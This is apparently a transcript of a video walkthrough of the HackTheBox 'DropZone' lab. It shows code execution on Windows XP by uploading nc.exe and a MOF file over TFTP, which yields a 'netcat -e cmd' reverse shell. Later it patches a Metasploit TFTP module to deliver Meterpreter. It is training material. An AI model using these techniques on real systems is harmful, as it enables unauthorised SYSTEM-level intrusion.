What's going on YouTube? This is PSExec and we're doing DropZone from HackTheBox, which I really like this box because it benefits those that do analysis of their own tools to see how they work. If you're the type of person that says, you know what, I use this PSExec thing a lot in Metasploit, let me see how it actually gets the code execution, this box may take you under 15 minutes because it's a Windows XP box with TFTP running as system, and the TFTP root directory is C:. So there's no hurdles to get right access to a Windows XP box as system. If you're the type of person that says, you know what, these tools are going to do some magic, I'm going to get shells, and I'm fine with that arrangement, this can be tough because you won't know exactly how to get code execution on XP from just writing a file. It was, I believe, patched, not working in more recent versions of Windows because, well, Stuxnet used this for both a privesc and lateral movement technique. But we'll get into all that in this video, and then also we'll probably get into debugging Metasploit modules and doing some cool things within Metasploit. So let's just jump in. As always, we'll start for the nmap, so nmap-sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it DropZone, then the IP address, which is 10.10.10.90. Can take some time to run, so I've already run it. Looking at the results, we see no ports are open. However, nmap detects the host is up, so most likely it responded via an ICMP ping. So if we just ping 10.10.10.90, we do see the box responds, so we know it is online. Nmap's default host discovery is ICMP port 80 and port 443. I think it's a TCP ACK on 80 and a TCP SYN on 443, and for ICMP it's probably a echo request and timestamp request. Not really needed information, just some information there, but when we don't see any attack surface on TCP, we're going to switch over to UDP, so we'll do nmap-su for UDP, -OA for output all formats. We'll put it in nmap, call it DropZone-UDP, and then 10.10.10.90. And the reason I don't use scripts on my initial UDP scan is because UDP scans are slow, so scripts just make it take forever. We do see one port is open, that is TFTP on port 69, so I'm going to do TFTP 10.10.10.90, and we'll just try getting a file. So we can do gets and puts with TFTP. So we'll get please subscribe and see that the server responds it couldn't find the file C:\please subscribe. Which is super handy because it's telling us the TFTP root directory is C:\, because that's what it prepended. So if we did a file we know exists, like Windows, it'll say the access to the path C:\Windows is denied. And it's saying that because TFTP can't download folders, so whenever you specify a folder, you get access denied. But the difference between these two error messages tells us we're operating out of C:\. So the next thing I wanted to do is find out what user I'm running as. So I tried to leak the username by putting it in a Windows variable, and I hoped that it said could not find file C:\, and then the current user. Wasn't the case, so I'm just going to try to download a file that is only accessible by local system. So Windows System32 config SAM, and we see the process cannot access this file because it's used by another process. It doesn't say access denied, so we know we're running as system. If you didn't know what this file is, I think this is the security and I forget what it is. Security Accounts Manager. That's what SAM stands for. And it's where I believe the boot key is stored. And the boot key is what is used to encrypt the SAM database, which is the local accounts. And also, I believe, the ntds.dit, which is the Active Directory file, which has the hashes for the whole domain. So you always want to grab this file. It requires system, and you have to be kind of above system because there's a NTFS lock on it. So unless you do like a shadow copy to download it or go below NTFS, you can't access the file while Windows is running. But we're going to assume right now we're running as local system because we didn't get access denied. The next file I'm going to try to get is \users because this is going to tell me if it's Windows XP 7 or 10, and we see it couldn't find that file. So I'm going to get /documents and settings, and we see it does 3 different requests, all broken up by these spaces. So I'll try get / and put documents and settings in quotes and see what happens. And it still does that. So we'll try get and put the whole thing in quotes. And it's still breaking up the request into 3 different requests. So this is a problem with this TFTP client, if we use something like a TFTP, I would assume we could just put it in quotes. But we don't have a TFTP. We only have TFTP right now. And because this isn't Windows 10, we have short file names. I think in Windows 10, Microsoft did away with them. And essentially, it's the old naming convention used in DOS because FAT32 had very short, or FAT16, I think. The file system used in the 90s, you couldn't have long file names. So for long file names, what they did is they abbreviated them. So documi and then this little squiggly thing that's left to the one would say, hey, this is the very first file that begins with those first 6 characters. So everything's always going to be 8 characters. So try get documi, then squiggly 1, and we see access to path, documents, and settings is denied. So a suspicion is confirmed this is probably a Windows XP box because it uses documents and settings and not users. So the final thing we kind of want to know, is this 32-bit or is this 64-bit? So we'll use the short path for program files. So that's /progra, then squiggly 1. And we see access to path C:program files is denied. So the second one, x86, would be /progra squiggly 2. And we see it couldn't find that file. So that folder doesn't exist, which means this is going to be a 32-bit XP box. So we know we're running as local system and we have write access to the box. I'm kind of ignoring the whole we can read any file from the box because the attack surface is only TFTP. So even if we could read a configuration that had a user password on it, we have no way to really use it because it's not listening on any services where it would ask for a username and password. So we just want to know, how can we write a file to a Windows box and get code execution? You could do a lot of Googling around for TFTP write file code execution Windows XP, but if you just knew how the tools you probably use work, it would be really obvious. So that's what we're going to look into. We're going to look into a Metasploit module I'm sure almost everyone has used, and that is the PSExec. So I'm doing locate PSExec dot, we'll just do locate PSExec and search grep for Metasploit. Okay, so we have quite a few things. We want the user shared Metasploit modules, exploits, Windows, SMB, PSExec, and let's look at this. So go to the very top, the header, initialize, and the targets. We have PowerShell, native upload, MOF upload. So let's look at what each of those are. Chances are we can ignore PowerShell because it's Windows XP that doesn't really have PowerShell, but while we're looking at it, might as well learn exactly how it works. So PowerShell is just running this function, execute PowerShell payload. So I'm going to search it for this script, and we don't have the function defined here. So I'm going to take that same locate PSExec grep Metasploit, and then zargs it for xargs for grep, and then execute _ PowerShell, I think it was. And we can see the very first result, this SMB client PSExec has def execute PowerShell, so this is probably what we want. Looking into this script, we can do execute PowerShell, and here we're calling it out. So the very first thing we're doing is another thing, cmd psh _ payload, encoding it, and this is the architecture, so probably x86 or x64. And one super cool thing about Metasploit is you can always drop into interactive Ruby. So let's do msf console, load up Metasploit, and we're going to show this by generating this cmd psh payload by using kind of a debugger-like feature. So let's use, what was it? Windows exploit SMB PSExec? Did I get that right? Probably not. It's taking a while. So let's just search for PSExec. And then use... I swapped them. It's exploit Windows, not Windows exploit. Show options. And we can see all the options. But if we just type IRB for interactive Ruby, we drop into a IRB shell. So we wanted to run cmd_psh_payload. So cmd_psh_payload. And the arguments, and I believe there were two. It is the payload and then the architecture. So we'll do the payload as please subscribe, and the architecture, we'll just do x86. So if we run this, it automatically generates that Ruby for us. So, or not Ruby, PowerShell. So let's copy all this. I don't think we need that first quote. And then go to a new window, v payload, or we'll make a directory, psh analysis. I think I misspelled that, oh well. And then edit payload encoded. Paste this in. We can cat this, and we see it does a new object on this giant memory string, which is a bunch of base 64. And it has calls around gzip and compression. So when we echo -n, now it's saying the gzip compression I see right there, right here. But if we echo this, base 64-d, get a bunch of garbage. However, I think if we do file, let's just put it to a file first. So we'll do payload.z, because it's going to be gzipped since we saw that in the code. But if we do file against that, we see it is gzip compressed data. So we can just do zcat, and this is going to cat and undo gz compression. And then if I can remember what I put the payload as, payload.z. So zcat payload.z. And we see the PowerShell payload now that Metasploit uses. And there's also one more base 64 part, and this is it executing code. So if we echo -n, base 64-d, we have please subscribe. So it generates all this code just to execute please subscribe in PowerShell, essentially. So we can exit IRB and go back to analyzing this. So we know what this payload looks like. And then it's going to do a PSExec. So let's see exactly what PSExec is. How this works. So we have definition PSExec, and then command disconnect true. So it's connecting to our host on IPC. This is, I think, I forget what IPC stands for. Inner procedural call, I think, or internal procedural call. Something procedure call. And then, so it's connecting to that. This is a share on Windows hosts. And we're doing DCE RPC, Distributed Computing Environment Remote Procedural Call. And then connecting to SVC CTL, so the service control. So I believe if you did like MMC, the Microsoft Management Console, opened it up, did local services, and then specified you want to connect to a remote host, that's what this functionality is. So we're connecting to the service control of a remote host. Here's access denied. It's still connecting. We're creating a service. And then I'm guessing we're going to upload a file eventually. Let's see. Where is it? Disconnect. So, simple disconnect. It's got to start upload a file somehow. Oh no, it's probably just executing the PowerShell. It's embedding that within the service maybe. Not exactly sure how that works, but you can go dig through that code if you want. I'm guessing it just embeds the PowerShell, and that's what this is doing. Command. Yep. So command gets passed to PSExec, and where's PSExec? So if we search command, go to the next instance, SVC handle. So it's embedding that PowerShell inside of SVC handle. So that's what the PowerShell payload does, is it creates a service and then embeds the PowerShell payload within the service it creates. It doesn't create an actual file, I believe. So the next one we look at actually does create a file. So let's go back. Let's see. we wanted Metasploit. Let's just do locate PSExec.rb. Should open these in multiple windows. Vim. Rename this window. We'll do module. And let's create a new pane. Send this to 4. Go back here. And let's look at the other PSExec module, psexec.rb. That here. And this will be PSExec. Okay, so the module. We just looked at exactly what execute PowerShell payload does. So the next thing it falls back to is native upload with workaround. So let's see, what is this? We search for this. We see the function is defined within the Metasploit module. And we have, if it's Windows 5.1, I guess this is a Windows XP thing. But we're doing a call to native upload data store share. So if we go into Metasploit, let's see, we can just exit this, show options. The SMB share is a defined thing, and it's set to admin $ by default, which I believe is C: Windows System 32. So let's look at where the native upload function is. And we don't see any definitions here. So let's go to the PSExec source, look at native upload, and here we go. So this is the other way it works, other than PowerShell. So file is equal to a random 8-character alpha string, and then service encoder. I'm not sure exactly what that's doing. It's uploading payload, so it's grabbing SMB_share, which is a variable name passed. If you look at the module, that is going to be the share from the Metasploit module. So by default, it's admin $. So doing a bunch of things, connecting to our host, and then admin $, and then opening a file, writing a file. And now, right here, I think it completely writes. We generated the payload exe service with all the options, created the file, disconnect, and then we're doing PSExec file location. So this time, instead of doing PSExec on the command, the PowerShell thing, we're doing PSExec on the file location. So if the host doesn't have PowerShell, it's going to connect via the service control, create a new service, tell that service to execute this file. But all of this doesn't really help us because we don't have 445 open, so we can't connect to the service control. So the last option is MOF upload. And I forget exactly what MOF stands for. I think it's Management Object Framework. Management Object Framework. MOF. Let's see if this is it. That's taking a while to load. So we'll just go back. So let's take a look at what MOF upload does. Searching for it in this module, we don't get anything. So let's go to the PSExec source. And at definition MOF upload, we have it doing the share is equal to data store our host and then the admin $. So it's ignoring the file share specified from Metasploit. And we're saying if the share is not admin, then we say it doesn't work. So it really expects the share to be Windows System 32. And then the next thing we're doing is connecting, generating a payload exe, and then dropping a file in System 32. So this is just dropping Meterpreter into System 32 or whatever we configure to be the payload. Then we're doing MOF name, generate MOF. And this is just like the generate PSH_CMD that we did earlier. So with MOF name and file name, it's uploading. And it uploads to System32 WBEM MOF and then the name. And disconnects. And if we go back to the module, it ends there. So it literally just got code execution by dropping a file in that directory. And that is one that I think got discovered by Stuxnet. And if you aren't familiar with Stuxnet, I'd highly recommend reading the book Countdown to Zero Day. The long story short is Stuxnet moved around networks by exploiting a print spooler driver to drop a file in the WBAM MOF directory, which then auto-executes and gains code execution. Additionally, if a computer had a printer shared out, it was remote code execution, so it worked as both a privesc and RCE. So let's take a look at exactly what a MOF is. So we have generate underscore MOF, the name, and file name. So we'll go back to Ruby, do IRB to interactive Ruby, generate underscore MOF. We'll do please subscribe, and we'll also say and retweet this video. So that is ugly. Let's do puts, which is like Ruby's print, and see if that is any better. There we go. So let's copy this MOF file and go over exactly what's going on here. And I'm probably going to delete some things because it's going to be pretty long and confusing. We don't need a lot of this. So let's do Meterpreter MOF, and then the initial.mof. So paste this in, and we have a pretty big file. So the very first thing we want to do is look at where please subscribe, the name. So that is going to be WMI good. And then the next thing we wanted was retweet, which is the command we're running. So we got JavaScript command here and retweet this video. So essentially a MOF works by compiling syntax like this into the WMI database. And before Stuxnet, I don't believe people really realized that you could just execute code like this because WMI just wasn't really explored. Now thinking about it, it seems really simple. In hindsight, it's always 2020, but essentially you create a filter to consumer binding to tie together a event filter and a script, or not a script, a event consumer. So that filter to consumer binding is saying, hey, when this event filter kicks off, go execute this program. And that event filter could just be, hey, watch this log file for when we create a new thing in the WMI database. So it just immediately executes code that way. If you want some good readings, I would highly recommend searching pop-pop-ret MOF and reading this blog post, as well as searching Black Hat WMI. Because MOF files aren't really a thing anymore because Windows stopped auto-compiling them by dropping them into a directory, but it still abuses WMI, which is the new hotness, or one of the new hotnesses. So this blog post is pretty good, has lots of diagrams showing you like the event filter and consumer being tied to filter consumer binding. The Black Hat WMI talk, this is from 2015, so about 3 years ago, has a bunch of information on event consumers. So we have 5 different event consumers. The log event consumer writes to a log file. Active script event consumer executes embedded VB or JScript. And this is what we're using because we saw JavaScript. We have NT event log. This creates I think a Windows event log. SMTP to send emails. And command line event consumer, which just pretty much does cmd.exe/c, I believe. The active event consumer is pretty cool now, especially with the release of .NET to JS, because within WMI, you can just have this execute .NET code, because you can convert a .NET class to JavaScript, then embed it within a WMI command, and it just is pretty hard to spot. So if you want further reading, go into all of that. But let's kind of explain how this works. So I'm going to take all the 2's out, all the twos are doing is cleaning up and deleting stuff afterwards. But they create a lot of noise in this, which could make it hard to understand what's happening. So this should work without the cleanup afterwards. So let's see. Let's start off with this. So we have the namespace root CIM v2. This is just a pretty much a table within WMI, I believe. The name of the class, the UUID for this event. I don't think this actually matters. We could change it to be whatever we wanted to, as long as it was the same like number of characters between each of these dashes. So let's go down, and the very first thing we want is the instance filter to consumer binding as bind. So where is bind else in here? There's no other binds. So this is saying filter to consumer binding, consumer is cons, and filter is filt. So let's search for cons, and we see the consumer is this active script event consumer. And it's just executing JScript, and we don't want it to do retweet this video. Let's say we want to execute netcat-e cmd 10.10.14.17, I think is my IP. Yep, 10.10.14.70, and let's do port 9001. So now we change the command to netcat back to me, and that's all that does. So the next one is filter, so let's search for filt, and event filter as filt, and this is just saying select star from instant creation event where target instance dot class is equal to my class 27736, and that's what our class name is. So upon creation of this class, execute this code. Sounds really simple. So let's see if this works. So the first thing we're going to have to do is grab NetCat, because NetCat's not default on Windows. So I'm just going to do a locate nc.exe, and we'll copy it from user share Windows binaries. So CP, and then I want to do a file against this to make sure it's 32-bit. Then we do TFTP 10.10.10.90. We want to change the mode to binary. By default, I think it's in ASCII mode. Since this isn't just ASCII, we want to send binary data. So I'll do put nc.exe, and I'm going to put it in Windows System 32, so I don't have to worry about pathing. If I put it in Windows System 32, it's just going to execute if I don't specify c:\\nc.exe or whatever. So could not put it there. We have to put the whole file name. So put nc.exe, and we can exit TFTP. Actually, we'll still need TFTP. We want to do nclvnp 9001. And what was the file name we had created? It was initial.mof. So we'll put initial.mof into Windows System 32 wbem mof, and then we'll call this anything we want. So please subscribe.mof, and this is the auto execute directory. So we saw this in the Metasploit modules. It's also in the registry. You can just Google like MOF auto exec directory. But we put this in, and we get a callback immediately. If we do who am I, we don't have that. Echo % username, don't have that either. So we can't look at what user we are just because I don't know how on Windows XP. But we can go to Documents and Settings, Administrator, and then we go to Desktop. We got root.txt, and then it's easy, but not that easy. So we didn't get the flag yet. If we go into the flags directory, we have a file 2 for the price of 1. So I'm going to do type, and then copy this, put this in quotes so we can see it. and we see for limited time only, keep an eye out on our ADS for new offers and discounts. And that's in capitals, so that's probably a hint. And the box killed a connection, but ADS is alternate data streams. So Windows XP doesn't have a method to view alternate data streams natively. So that means we have to download a program. So I'll do stream sysinternals. I think that's the file name. Yep, streams. And this is something that will work on Windows XP to view alternate data streams. And this was done on a few other boxes. I want to say Jeeves, and there was another one, but drawing a blank on the name. So copy, download streams.zip. Let's unzip this. And let's move streams into MOF. The downside of TFTP is you can see every failed attempt still is creating a file. So yeah, we just get a messy directory. So let's go into MOF, TFTP 10.10.10.90 mode binary. And then we want to put streams.exe, Windows System 32, streams.exe. And I'm just putting that so we don't have to use the absolute path every time we want to call streams. So if we exit this, we can, let's see, nclvnp 9001, and let's put our file again. So we'll call this, I always like using different names when I upload just so we can use the same name and see what happens. So please subscribe.mof, and we get a shell. So name doesn't really matter that much. So if we go to users, not users, documents and settings, administrator, desktop, flags was it? And we can do streams. I'm just going to do to star streams dash except EULA because this is a sysinternal tools and we always have to do that. Streams, recurse subdirectories, delete stream. We can just do to star. And there we go. We got both the root and the user text files. So that is the box. But we're going to do a little bit more in this and investigate the Metasploit modules, get a working Metasploit module, learn more about debugging Metasploit modules. So the rest of this video will be all about Metasploit. Let's clean up all these panes. I'm just doing the hotkey and then X to delete pane. And this should be good. So first thing we want to do is locate TFTP grep for Metasploit and see what exists. Probably grep exploits. And then we get FTP as well. So let's, because like 32-bit FTP says TFTP. So I'm going to change my grep to be /TFTP/. And we just get a list of TFTP exploits. So long file name doesn't seem like it's going to really help us, but distinct TFTP traversal, that may. So let's look at exactly what this is doing. This exploit exploits a vulnerability in the distinct TFTP server, contains a directory traversal vulnerability that allows a remote attacker to write a file to the file system, which results into system. So I'm going to search this for MOF, and we see this exploit is using a MOF file. So let's see, how does this work? So definition of exploit, grabbing our host, exe name, MOF name, levels, uploads, the malicious executable that we want to run. This is going to be Meterpreter to C: Windows System 32. This is exactly what we did with NetCat. And you're just doing this to avoid having to worry about absolute paths and things like that. Then we're sleeping for a little bit and sending a MOF file to WMI. So this should work if we just run this, because it's doing exactly what we had done. So let's do MSF console, and I'm going to copy this. And once Metasploit opens up, we can do use, and then show options, set our host to 10.10.10.90, set lhost to ton0. Do this twice just so we make sure we listen on that. And this should just magically work. So we go to run, and we get incorrect file name and packet. So if we do show options, we have the depth set to 10, which that may be the issue because that's doing like ... /. So let's see what happens if we do a new thing, TFTP 10.10.10.90, get /Windows, access path is denied, get ... / Windows, incorrect file name. So you have to be dead on with your path traversals. So if we do set depth to 0 and run this, it's still doing the same exact thing. So at this point, you can analyze the code or decide you wanted to debug it. And we're just going to go into the debugging route. So I'm going to exit Metasploit because we're running Metasploit within the user share. And you should never really modify files within USR because this is where app thinks they are, and if we do things without telling our package manager, then bad things can happen. So I'm going to copy the Metasploit framework into /opt, which is generally where I store files that I actually work with and then compile, etc. So we'll go into opt, Metasploit framework, and then I'm going to do a gem install, and we'll do pry.byebug, pry.byebug. And this is a Ruby debugger. We can Google this. And you can see it's step-by-step debugging. We'll also want to copy something here. I want to copy this into my pyrc file because I don't want to type continue every time. This is just remapping continue to C. So let's do v py, what was the thing? Pyrc. Paste. And then this sounds also good. Enter will repeat the last command. So we got that. And then we gotta just tell Metasploit to use this module. So I tried doing it in the gem file, and I've always had bad luck doing it. This is the way I found that works the easiest. Just go into MSF console, require pry-byebug, and now we just have to copy that module to our local directory, and then we can start working with it. So let's run locate to find that module again. We'll copy the Metasploit path, and then do a make directory -p to create all parent directories. And we'll do our home directory .msf4, paste this in. So now we have the TFTP folder structure in our Metasploit 4 directory. And then we want to copy the script into that directory, and we'll call this TFTP _mof.rb. So let's edit that file. And we don't really care about all this metadata. If we're actually creating a script and uploading it, we would, but this would just take a lot of time to modify the name and stuff. All we care about is how the script is working and how we can get into a debugging session. So just at the beginning of exploit, type binding.pry and then exit it. So now we'll run a modified MSF console, and this is the MSF console that we have require pry-byebug in it. And then once it loads, we can just do use exploits exploit Windows TFTP, TFTP underscore MOF, show options, and all we care about is setting our host to be 10.10.10.90, setting depth to be 0, and setting lhost to be ton0. So when we run this script, we should get dropped to a debug session. So here we are, and we are on line 84, which is right after binding.pry, and then we can just hit N to go to next line. And then if we wanted to see the variable of exe name, we just type exe name, hit enter, and we can see it is creating the exe zjpgvcc.exe. So we can break, let's see, where is it getting a file? So it's uploading this. So let's break right after levels. So break 94. Continue with C. And we're at line 94. So now we can do levels, because a depth, if we just type depth, it's set to 10. And if we looked, we had set depth to 0. So looking at this code, we have Ruby's weird way of doing if-thens. If depth is nothing, which is nil, or depth is equal to 0, set depth to 10. And this is what is screwing us up. So if we print levels, even though we set depth to 0, it is putting all of that junk there. So let us exit this, create a new pane, go into our directory, edit TFTP MOF, and then go to depth, and we'll just delete this if then to say depth is always equal to data stored depth. Okay. And then reload to reload this module. Run it again. And we want to remember to break at 94. We gotta kill. If we do jobs. Wait. The device is already in use, and we don't have any active jobs. Set hello port to be 9002. I don't know why port 4444 are still listening. Oh well, I guess I just exited the script weird and it never cleaned that up. But back into debugging, we can set a breakpoint for, what is it? 94. Continue. It'll take a few seconds to step through to get to this part. And then now we can do depth. Depth is equal to 0. And that levels ... times depth. If we do levels, it is nothing. So let's do R for run. We'll get out of, maybe just C to continue. Continue. Maybe it's spell out run. Next. Continue. There we go. And nothing really happened. We didn't get a call back. If we are super observant, we see at the start of this exploit, it is sending 145 blocks, and after about 30 blocks, it starts uploading the MOF. So if we go back and look at the script, it's got a sleep command after that upload. So maybe this upload isn't waiting for this to finish. Maybe it just starts the upload, sleeps for an indeterminate amount of time, and then hopes it's done and begins uploading the second thing. So let's just increase the sleep timer by a little bit. And we'll reload a module. And actually we can take out the pry.byebug. We don't need to debug this anymore. So we can remove that. reload it again. And I'm faithful this is going to work, so I'm going to even exit that window. And we'll just wait for this to finish reloading and run it again. So, run. And are we going to get a callback? We started a handle on port 9002. It's now creating all the payloads. And that's weird. I guess I did Q exclamation point and didn't save it. We'll just do next, continue. And we see it just randomly stopped at 27 blocks. That is bizarre. So reload. Let's edit this. Do I have in my history? So cd msf4 modules exploits Windows TFTP vim TFTP MOF. I took that out. That is bizarre. Reload. Because part of me is wondering if having pry in there and load and going through the debugger interface, if that's actually slowing the module down. So run this again. Started the listener. And it's generating the payloads now. And hopefully this time it works. Why are we going into this? Just probably have a run. Finish is F. We'll just do F. And it's stopping at 26 bytes. We got 145 blocks. Let's Control C, escape out of this, exit, and then run MSF console again. Maybe it had something weird in memory, because this is behaving bizarre. It shouldn't have broke if we had commented out the binding. Do I have it anywhere else? Nope, it's not in the script at all. So let's use this, rhost, depth, and lhost, lport, run. Now it shouldn't go into our debugger. There we go. And it stopped at 51 blocks again. It should be going beyond that, I thought. Uploaded, and no session created. So show options, Windows Meterpreter reverse TCP. Let's just go into this. Set this for 10, increasing this delay. Upload exe name. That looks good. Ruby reload. We'll run this again. I have no clue why it is stopping at block 52. Let's look at the code one last time. Go here. So that's where we set that timeout. Oh, there's another select. So it does... Let's see, what is this function I'm in? Upload. Oh. So, let's see. Yeah, so this was set to 1 up here. This is the upload function. And what happened was, the timeout here is select 1, this is the timeout. And then when that finishes, it says TFTP client stop. So it's definitely backgrounding the file upload and just hoping it finishes within this time and then stopping the transfer. I set the timeout after this upload, but it didn't matter because the TFTP transfer already stopped. So if we set this to 5, let's see if we get beyond 52 blocks. So reload. Now this all makes sense. Helps if I read the whole source code. But run this. Let's see. Set depth 0. Run. There we go. and it's going beyond that. So we have uploaded 145 blocks, which is what we expected to upload, and now we have Meterpreter session 1 has been open. We do sessions-i1. We already did. We're already in Meterpreter, so we can just do shell. Okay, that was weird. Echo % username %, and it says DropZone $. This means we're a local system. The dollar is username, generally means it's a system account. So now we're got Meterpreter on the box. We can use Meterpreter to look into WMI and kind of explore this. So let's type help to see the Meterpreter commands, and we don't see anything with WMI. So what I'm going to do is load, and we have load-L to list all the modules. So we have a few more Meterpreter modules we can load. I'm going to load the extended API. And now if we do help again, we have a bunch more Meterpreter commands. And one of them is WMI query. So if we wanted to, we could just Google WMI Win32 process. This is just like a WMI class thing explaining exactly how to use WMI. But we're just going to do an examination on our MOF file. So if we do cd MOF, we can look at initial.mof and say select star from, let's do Win32 provider. So go back into Meterpreter, select star, my query, select star from this, and it errored. Do we have to put this in quotes, or is my WMI wrong? I think my WMI is wrong, so let's go back here. Let's try a different one. Let's look at all the event filters. So we can do WMI query, select star from event filter, and we can see the instance deletion event, which isn't in our script, but this is the one Meterpreter did. We had deleted this. So upon instant deletion, I think it's deleting this file. Let's see. We go back in here. We can try select star from filter to consumer binding. See if this shows anything. Select WMI query. Select star from this. And we can see there's currently 2 filter to consumer bindings. And we got ASEC and QND ASEC. So this is the second one that Meterpreter creates. So this is all weird to you. We could just ignore doing the WMI queries about what we created and just explore WMI in general. So if we do WMI query, let's go here. Let's do Win32 process. So this is a class. So if we select star from this class, forgot an underscore. Is it case sensitive? That should have done it. WMI query. Select star from Win32 process. What did I have different there? Oh, I didn't have a from. But we see this is all almost impossible to read because it goes forever in length because it has each of these kind of tables. So we can look at what we'd want to see. So we can see executable path. That sounds cool. So if we do select executable path from Win32 underscore process, put these in quotes. Forgot WMI query. Forgot a quote. There we go. we can see everything that is running on this system. And this looks odd because this is our Meterpreter session. Remember, we have a bunch of random characters.exe in system32. Well, just looking at the processes shows us our Meterpreter session. So we could also do some pretty cool things like, let's see, what else is in Win32? Win32 share. So if we do WMI query, select stir from Win32 share, we can see all the share drives on this machine, IPC, admin, and C. So you can go and explore WMI a bit more and learn that. I'd highly recommend it. It's really handy for just finding quick information about remote computers. You can do things like query the antivirus to see what exclusions are applied, just all sorts of things in the WMI database. So I think that's going to end the video for now. Take care, and I will see you all next week.